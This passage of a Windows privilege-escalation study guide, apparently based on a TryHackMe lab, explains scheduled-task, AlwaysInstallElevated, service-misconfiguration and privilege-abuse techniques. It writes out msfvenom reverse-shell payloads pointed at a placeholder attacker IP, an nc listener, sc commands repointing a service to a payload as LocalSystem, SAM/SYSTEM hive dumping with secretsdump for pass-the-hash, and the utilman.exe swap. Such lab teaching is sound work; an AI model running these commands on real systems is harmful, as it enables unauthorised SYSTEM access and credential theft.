</span><span id="__span-2-15"><a id="__codelineno-2-15" name="__codelineno-2-15" href="#__codelineno-2-15"></a>Power Management:                     Stop On Battery Mode, No Start On Batteries
</span><span id="__span-2-16"><a id="__codelineno-2-16" name="__codelineno-2-16" href="#__codelineno-2-16"></a>Run As User:                          taskusr1
</span><span id="__span-2-17"><a id="__codelineno-2-17" name="__codelineno-2-17" href="#__codelineno-2-17"></a>Delete Task If Not Rescheduled:       Disabled
</span><span id="__span-2-18"><a id="__codelineno-2-18" name="__codelineno-2-18" href="#__codelineno-2-18"></a>Stop Task If Runs X Hours and X Mins: 72:00:00
</span><span id="__span-2-19"><a id="__codelineno-2-19" name="__codelineno-2-19" href="#__codelineno-2-19"></a>Schedule:                             Scheduling data is not available in this format.
</span><span id="__span-2-20"><a id="__codelineno-2-20" name="__codelineno-2-20" href="#__codelineno-2-20"></a>Schedule Type:                        At system start up
</span><span id="__span-2-21"><a id="__codelineno-2-21" name="__codelineno-2-21" href="#__codelineno-2-21"></a>Start Time:                           N/A
</span><span id="__span-2-22"><a id="__codelineno-2-22" name="__codelineno-2-22" href="#__codelineno-2-22"></a>Start Date:                           N/A
</span><span id="__span-2-23"><a id="__codelineno-2-23" name="__codelineno-2-23" href="#__codelineno-2-23"></a>End Date:                             N/A
</span><span id="__span-2-24"><a id="__codelineno-2-24" name="__codelineno-2-24" href="#__codelineno-2-24"></a>Days:                                 N/A
</span><span id="__span-2-25"><a id="__codelineno-2-25" name="__codelineno-2-25" href="#__codelineno-2-25"></a>Months:                               N/A
</span><span id="__span-2-26"><a id="__codelineno-2-26" name="__codelineno-2-26" href="#__codelineno-2-26"></a>Repeat: Every:                        N/A
</span><span id="__span-2-27"><a id="__codelineno-2-27" name="__codelineno-2-27" href="#__codelineno-2-27"></a>Repeat: Until: Time:                  N/A
</span><span id="__span-2-28"><a id="__codelineno-2-28" name="__codelineno-2-28" href="#__codelineno-2-28"></a>Repeat: Until: Duration:              N/A
</span><span id="__span-2-29"><a id="__codelineno-2-29" name="__codelineno-2-29" href="#__codelineno-2-29"></a>Repeat: Stop If Still Running:        N/A
</span></code></pre></div>
<p>If our current user can modify or overwrite the <code>Task to Run</code> executable, we can control what gets executed by the user, resulting in a simple privilege escalation.
To check the file permissions on the executable, we use <code>icacls</code> like so: <code>icacls c:\tasks\schtask.bat</code>.</p>
<p>Example output:</p>
<div class="language-text highlight"><pre><span></span><code><span id="__span-3-1"><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a>c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
</span><span id="__span-3-2"><a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a>                    BUILTIN\Administrators:(I)(F)
</span><span id="__span-3-3"><a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a>                    BUILTIN\Users:(I)(F)
</span></code></pre></div>
<p>As can be seen in the result, the <code>BUILTIN\Users</code> group has <code>full access (F)</code> over the task's binary.
This means we can modify the .bat file and insert any payload we like.
All that's left to do is change the bat file to spawn a reverse shell.</p>
<h3 id="alwaysinstallelevated-msi-files-run-with-elevated-privileges">AlwaysInstallElevated (.msi files run with elevated privileges)<a class="headerlink" href="#alwaysinstallelevated-msi-files-run-with-elevated-privileges" title="Permanent link">&para;</a></h3>
<p>Windows installer files (also known as <code>.msi</code> files) are used to install applications on the system and usually run with the privilege level of the user that starts it.
However, these can be configured to run with higher privileges from any user account (even unprivileged ones).
This could potentially allow us to generate a malicious MSI file that would run with admin privileges.</p>
<p>This method <code>requires two registry values to be set</code>.
You can query these from the command line using the commands below.
- <code>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer</code>
- <code>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer</code></p>
<p>If these are set, you can generate a malicious .msi file using msfvenom:</p>
<p><code>msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi</code></p>
<h2 id="abusing-service-misconfigurations">Abusing Service Misconfigurations<a class="headerlink" href="#abusing-service-misconfigurations" title="Permanent link">&para;</a></h2>
<h3 id="what-are-windows-services">What are Windows Services?<a class="headerlink" href="#what-are-windows-services" title="Permanent link">&para;</a></h3>
<ul>
<li>Services are <code>background processes that run without user interaction</code>.</li>
<li>They <code>often start automatically</code> and <code>run with system-level privileges</code> (e.g., LocalSystem, LocalService, or NetworkService accounts).</li>
<li>Misconfigured services can allow attackers to escalate privileges by abusing their properties.</li>
</ul>
<p>Windows services are managed by the <code>Service Control Manager (SCM)</code>.
The SCM is a process in charge of managing the state of services as needed, <code>checking the current status of any given service</code> and generally <code>providing a way to configure services</code>.
Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started.
It is important to note that <code>service executables implement special functions</code> to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully.
<code>Each service also specifies the user account under which the service will run</code>.
To better understand the structure of a service, let's check the apphostsvc service configuration with the <code>sc qc</code> command:</p>
<div class="language-text highlight"><pre><span></span><code><span id="__span-4-1"><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a>[SC] QueryServiceConfig SUCCESS
</span><span id="__span-4-2"><a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a>
</span><span id="__span-4-3"><a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a>SERVICE_NAME: apphostsvc
</span><span id="__span-4-4"><a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a>        TYPE               : 20  WIN32_SHARE_PROCESS
</span><span id="__span-4-5"><a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a>        START_TYPE         : 2   AUTO_START
</span><span id="__span-4-6"><a id="__codelineno-4-6" name="__codelineno-4-6" href="#__codelineno-4-6"></a>        ERROR_CONTROL      : 1   NORMAL
</span><span id="__span-4-7"><a id="__codelineno-4-7" name="__codelineno-4-7" href="#__codelineno-4-7"></a>        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k apphost
</span><span id="__span-4-8"><a id="__codelineno-4-8" name="__codelineno-4-8" href="#__codelineno-4-8"></a>        LOAD_ORDER_GROUP   :
</span><span id="__span-4-9"><a id="__codelineno-4-9" name="__codelineno-4-9" href="#__codelineno-4-9"></a>        TAG                : 0
</span><span id="__span-4-10"><a id="__codelineno-4-10" name="__codelineno-4-10" href="#__codelineno-4-10"></a>        DISPLAY_NAME       : Application Host Helper Service
</span><span id="__span-4-11"><a id="__codelineno-4-11" name="__codelineno-4-11" href="#__codelineno-4-11"></a>        DEPENDENCIES       :
</span><span id="__span-4-12"><a id="__codelineno-4-12" name="__codelineno-4-12" href="#__codelineno-4-12"></a>        SERVICE_START_NAME : localSystem
</span></code></pre></div>
<p>Here we can see that the associated executable is specified through the <code>BINARY_PATH_NAME</code> parameter, and the account used to run the service is shown on the <code>SERVICE_START_NAME</code> parameter.</p>
<p>Services have a <code>Discretionary Access Control List</code> or <a href="https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html"><code>DACL</code></a>, which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges.
The DACL can be seen from Process Hacker (available on your machine's desktop):</p>
<p><img alt="DACL" src="https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/d8244cfd9d64a7be30f5fb0308fd0806.png" /></p>
<p>All of the services configurations are stored on the registry under <code>HKLM\SYSTEM\CurrentControlSet\Services\</code>:</p>
<p><img alt="HKLM" src="https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/06c05c134e4922ec8ff8d9b56382c58f.png" /></p>
<p>A subkey exists for every service in the system.
Again, we can see the associated executable on the <code>ImagePath</code> value and the account used to start the service on the <code>ObjectName</code> value.
If a DACL has been configured for the service, it will be stored in a subkey called <code>Security</code>.
As you have guessed by now, only administrators can modify such registry entries by default.</p>
<h3 id="insecure-permissions-on-service-executable">Insecure Permissions on Service Executable<a class="headerlink" href="#insecure-permissions-on-service-executable" title="Permanent link">&para;</a></h3>
<p>This vulnerability arises when the executable file of a service is <code>stored in a location with weak permissions</code>, allowing unauthorized users to replace it with a malicious file.</p>
<p>To recap: if the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.</p>
<p>To understand how this works, let's look at a vulnerability found on Splinterware System Scheduler.</p>
<p>Example:
1. To start, we will query the service configuration using <code>sc</code>.
2. We can see that the service installed by the vulnerable software runs as <code>.\svcuser1</code> and the executable associated with the service is in <code>C:\Progra~2\System~1\WService.exe</code>.
3. We then proceed to check the permissions on the executable: And here we have something interesting. The <code>Everyone</code> group has <code>modify permissions (M)</code> on the service's executable.
4. Generate an exe-service payload using msfvenom and serve it through a python webserver.
5. Once the payload is in the Windows server, we proceed to replace the service executable with our payload.
6. Since we need another user to execute our payload, we'll want to grant <code>full permissions to the Everyone group</code> as well.
7. We start a reverse listener on our attacker machine.
8. And finally, restart the service. While in a normal scenario, you would likely have to wait for a service restart, you have been assigned privileges to restart the service yourself to save you some time. Use <code>sc stop windowsscheduler</code> and then <code>sc start windowsscheduler</code>.</p>
<h3 id="unquoted-service-paths">Unquoted Service Paths<a class="headerlink" href="#unquoted-service-paths" title="Permanent link">&para;</a></h3>
<p>When we can't directly write into service executables as before, there might still be a chance to <code>force a service into running arbitrary executables</code> by using a rather obscure feature.
When working with Windows services, a very particular behaviour occurs when the service is configured to point to an <code>unquoted executable</code>.
By unquoted, we mean that the <code>path of the associated executable isn't properly quoted to account for spaces on the command</code>.</p>
<p>As an example, let's look at the difference between two services:</p>
<ul>
<li><code>BINARY_PATH_NAME   : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service</code>, quoted.</li>
<li><code>BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe</code>, unquoted.</li>
</ul>
<p>When the SCM tries to execute the associated binary, a problem arises.
Since there are spaces on the name of the "Disk Sorter Enterprise" folder, the command becomes <code>ambiguous</code>, and the SCM doesn't know which of the following you are trying to execute:</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Argument 1</th>
<th>Argument 2</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>C:\MyPrograms\Disk.exe</code></td>
<td><code>Sorter</code></td>
<td><code>Enterprise\bin\disksrs.exe</code></td>
</tr>
<tr>
<td><code>C:\MyPrograms\Disk Sorter.exe</code></td>
<td><code>Enterprise\bin\disksrs.exe</code></td>
<td></td>
</tr>
<tr>
<td><code>C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe</code></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<p>This has to do with how the command prompt parses a command. Usually, when you send a command, <code>spaces are used as argument separators</code> unless they are part of a quoted string.
This means the "right" interpretation of the unquoted command would be to execute <code>C:\\MyPrograms\\Disk.exe</code> and take the rest as arguments.</p>
<p>Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:</p>
<ol>
<li>First, search for <code>C:\\MyPrograms\\Disk.exe</code>. If it exists, the service will run this executable.</li>
<li>If the latter doesn't exist, it will then search for <code>C:\\MyPrograms\\Disk Sorter.exe</code>. If it exists, the service will run this executable.</li>
<li>If the latter doesn't exist, it will then search for <code>C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe</code>. This option is expected to succeed and will typically be run in a default installation.</li>
</ol>
<p>From this behaviour, the problem becomes evident. If an attacker creates any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary executable.
While this sounds trivial, most of the service executables will be installed under <code>C:\Program Files</code> or <code>C:\Program Files (x86)</code> by default, which <code>isn't writable by unprivileged users</code>.</p>
<h3 id="insecure-service-permissions">Insecure Service Permissions<a class="headerlink" href="#insecure-service-permissions" title="Permanent link">&para;</a></h3>
<p>You might still have a slight chance of taking advantage of a service if the service's executable DACL is well configured, and the service's binary path is rightly quoted.
Should the <code>service DACL</code> (<code>not the service's executable DACL</code>) allow you to modify the configuration of a service, you will be able to <code>reconfigure the service</code>.
This will allow you to point to any executable you need and run it with any account you prefer, including SYSTEM itself.</p>
<p>To check for a service DACL from the command line, you can use <code>Accesschk</code> from the <code>Sysinternals suite</code>.</p>
<ol>
<li><code>accesschk64.exe -qlc thmservice</code></li>
<li><code>msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe</code></li>
<li><code>icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F</code></li>
<li><code>sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem</code></li>
<li><code>sc stop THMService</code></li>
<li><code>sc start THMService</code></li>
<li><code>nc -lvp 4447</code></li>
</ol>
<h2 id="abusing-dangerous-privileges">Abusing dangerous privileges<a class="headerlink" href="#abusing-dangerous-privileges" title="Permanent link">&para;</a></h2>
<p>Each user has a set of assigned privileges that can be checked with the following command: <code>whoami /priv</code>.</p>
<p>A complete list of available privileges on Windows systems is available <a href="https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants">here</a>.
You can find a comprehensive list of exploitable privileges on the <a href="https://github.com/gtworek/Priv2Admin/tree/master">Priv2Admin</a> Github project.</p>
<h3 id="sebackup-serestore">SeBackup / SeRestore<a class="headerlink" href="#sebackup-serestore" title="Permanent link">&para;</a></h3>
<p>Allow users to read and write to any file in the system, ignoring any <code>DACL</code> in place.
The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.</p>
<p>Having this power, an attacker can trivially escalate privileges on the system by using many techniques.
The one we will look at consists of copying the <code>SAM</code> and <code>SYSTEM registry hives</code> to extract the local Administrator's password hash.</p>
<ol>
<li>We will need to open a command prompt using the "Open as administrator" option to use these privileges.</li>
<li><code>whoami /priv</code></li>
<li>Backup the <code>SAM</code> and <code>SYSTEM</code> hashes: <code>reg save hklm\system C:\Users\THMBackup\system.hive</code> &amp; <code>reg save hklm\sam C:\Users\THMBackup\sam.hive</code></li>
<li>This will create a couple of files with the registry hives content. We can now copy these files to our attacker machine using SMB or any other available method.</li>
<li>Use <code>impacket</code> to retrieve the users' password hashes: <code>python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL</code>.</li>
<li>Use the Administrator's hash to perform a <code>Pass-the-Hash attack</code> and gain access to the target machine with SYSTEM privileges.</li>
</ol>
<h3 id="setakeownership">SeTakeOwnership<a class="headerlink" href="#setakeownership" title="Permanent link">&para;</a></h3>
<p>Allows a user to take <code>ownership of any object on the system</code>, including <code>files</code> and <code>registry keys</code>.</p>
<p>E.g: <code>utilman.exe</code>, a built-in Windows application used to provide Ease of Access options during the lock screen. Abuse it to escalate privileges this time.</p>
<p>Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary for any payload we like.
As we can take ownership of any file, replacing it is trivial.</p>
<ol>
<li><code>takeown /f C:\Windows\System32\Utilman.exe</code></li>
<li><code>icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F</code></li>
<li><code>copy cmd.exe utilman.exe</code></li>
<li>Lock the screen and click the "Ease of Access" button to trigger <code>utilman</code>.</li>
</ol>
<h3 id="others-summary">Others / Summary<a class="headerlink" href="#others-summary" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>Privilege</th>
<th>Description</th>
<th>Abuse</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>SeImpersonatePrivilege</code></td>
<td>Allows a process to impersonate another user.</td>
<td>Exploited in token impersonation attacks (e.g., <code>JuicyPotato</code>, <code>RoguePotato</code>) to escalate to SYSTEM.</td>
</tr>
<tr>
<td><code>SeAssignPrimaryTokenPrivilege</code></td>
<td>Allows a process to assign a token to a process.</td>
<td>Combined with SeImpersonatePrivilege for privilege escalation.</td>
</tr>
<tr>
<td><code>SeCreateTokenPrivilege</code></td>
<td>Allows a user to create new tokens.</td>
<td>Exploited to create a new SYSTEM token and elevate privileges.</td>
</tr>
<tr>
<td><code>SeTakeOwnershipPrivilege</code></td>
<td>Allows a user to take ownership of any object.</td>
<td>Can be used to take control of files or processes owned by SYSTEM.</td>
</tr>
<tr>
<td><code>SeDebugPrivilege</code></td>
<td>Allows debugging of any process, including SYSTEM processes.</td>
<td>Exploited to inject code into SYSTEM processes or access sensitive data in memory.</td>
</tr>
<tr>
<td><code>SeLoadDriverPrivilege</code></td>
<td>Allows loading of device drivers.</td>
<td>Exploited to load malicious drivers, which run in kernel mode (ring-0).</td>
</tr>
<tr>
<td><code>SeRestorePrivilege</code></td>
<td>Allows restoring files or directories regardless of permissions.</td>
<td>Used to overwrite critical files, bypassing NTFS permissions.</td>
</tr>
<tr>
<td><code>SeShutdownPrivilege</code></td>
<td>Allows shutting down the system.</td>
<td>Used for denial-of-service attacks.</td>
</tr>
</tbody>
</table>
<h2 id="abusing-vulnerable-software">Abusing vulnerable software<a class="headerlink" href="#abusing-vulnerable-software" title="Permanent link">&para;</a></h2>
<p>Software installed on the target system can present various privilege escalation opportunities.
As with drivers, organisations and users may not update them as often as they update the operating system.
You can use the <code>wmic</code> tool to list software installed on the target system and its versions.</p>
<p>This command will dump information it can gather on installed software: <code>wmic product get name,version,vendor</code>.</p>
<p>Remember that the wmic product command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here.
It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.</p>
<p>Once we have gathered product version information, we can always search for existing exploits on the installed software online on sites like <code>exploit-db</code>, <code>packet storm</code> or plain old <code>Google</code>, amongst many others.</p>
<h2 id="tools-of-the-trade">Tools of the trade<a class="headerlink" href="#tools-of-the-trade" title="Permanent link">&para;</a></h2>
<p>Various tools can help you conduct system enumeration to find privilege escalation vectors. Below are some commonly used tools along with their descriptions and usage.</p>
<table>
<thead>
<tr>
<th><strong>Tool</strong></th>
<th><strong>Description</strong></th>
<th><strong>Usage</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>WinPEAS</strong></td>
<td>A script that enumerates the target system to find privilege escalation paths.</td>
<td>- Download the precompiled executable or <code>.bat</code> script. <br> - Run: <code>winpeas.exe &gt; outputfile.txt</code> <br> - Output may be long, so redirect to a file for easier review.</td>
</tr>
<tr>
<td><strong>PrivescCheck</strong></td>
<td>A PowerShell script to search for common privilege escalation vectors.</td>
<td>- Run: <code>Set-ExecutionPolicy Bypass -Scope process -Force</code> <br> - Execute: <code>. .\PrivescCheck.ps1</code> <br> - Then, run: <code>Invoke-PrivescCheck</code></td>
</tr>
<tr>
<td><strong>WES-NG (Windows Exploit Suggester - Next Generation)</strong></td>
<td>A Python script that identifies missing patches and vulnerabilities on the target system.</td>
<td>- Update the database: <code>wes.py --update</code> <br> - Run <code>systeminfo</code> on the target machine and save output to <code>systeminfo.txt</code> <br> - Run: <code>wes.py systeminfo.txt</code> on the attacking machine.</td>
</tr>
<tr>
<td><strong>Metasploit (multi/recon/local_exploit_suggester)</strong></td>
<td>A Metasploit module that suggests local exploits based on the target system's vulnerabilities.</td>
<td>- Use the <code>multi/recon/local_exploit_suggester</code> module if you have a Meterpreter shell on the target system to identify privilege escalation vectors.</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Note:</strong> Automated tools may not catch all potential escalation vectors, so manual enumeration is still recommended.</p>
</blockquote>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
    
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
    <div class="md-copyright__highlight">
      <a href="https://github.com/grimy86/grimy86.github.io/blob/main/LICENSE">Copyright &copy; since 2024</a>

    </div>
  
  
</div>
      
        <div class="md-social">
  
    
    
    
    
    <a href="mailto:grimy86@proton.me" target="_blank" rel="noopener" title="" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M48 64C21.5 64 0 85.5 0 112c0 15.1 7.1 29.3 19.2 38.4l217.6 163.2c11.4 8.5 27 8.5 38.4 0l217.6-163.2c12.1-9.1 19.2-23.3 19.2-38.4 0-26.5-21.5-48-48-48zM0 176v208c0 35.3 28.7 64 64 64h384c35.3 0 64-28.7 64-64V176L294.4 339.2a63.9 63.9 0 0 1-76.8 0z"/></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://github.com/grimy86" target="_blank" rel="noopener" title="github.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
      <div class="md-progress" data-md-component="progress" role="progressbar"></div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../../..", "features": ["navigation.instant", "navigation.instant.prefetch", "navigation.instant.progress", "navigation.tracking", "navigation.tabs", "navigation.sections", "navigation.path", "navigation.prune", "navigation.indexes", "navigation.top", "navigation.footer"], "search": "../../../assets/javascripts/workers/search.f8cc74c7.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../../assets/javascripts/bundle.c8b220af.min.js"></script>
      
    
  </body>
</html>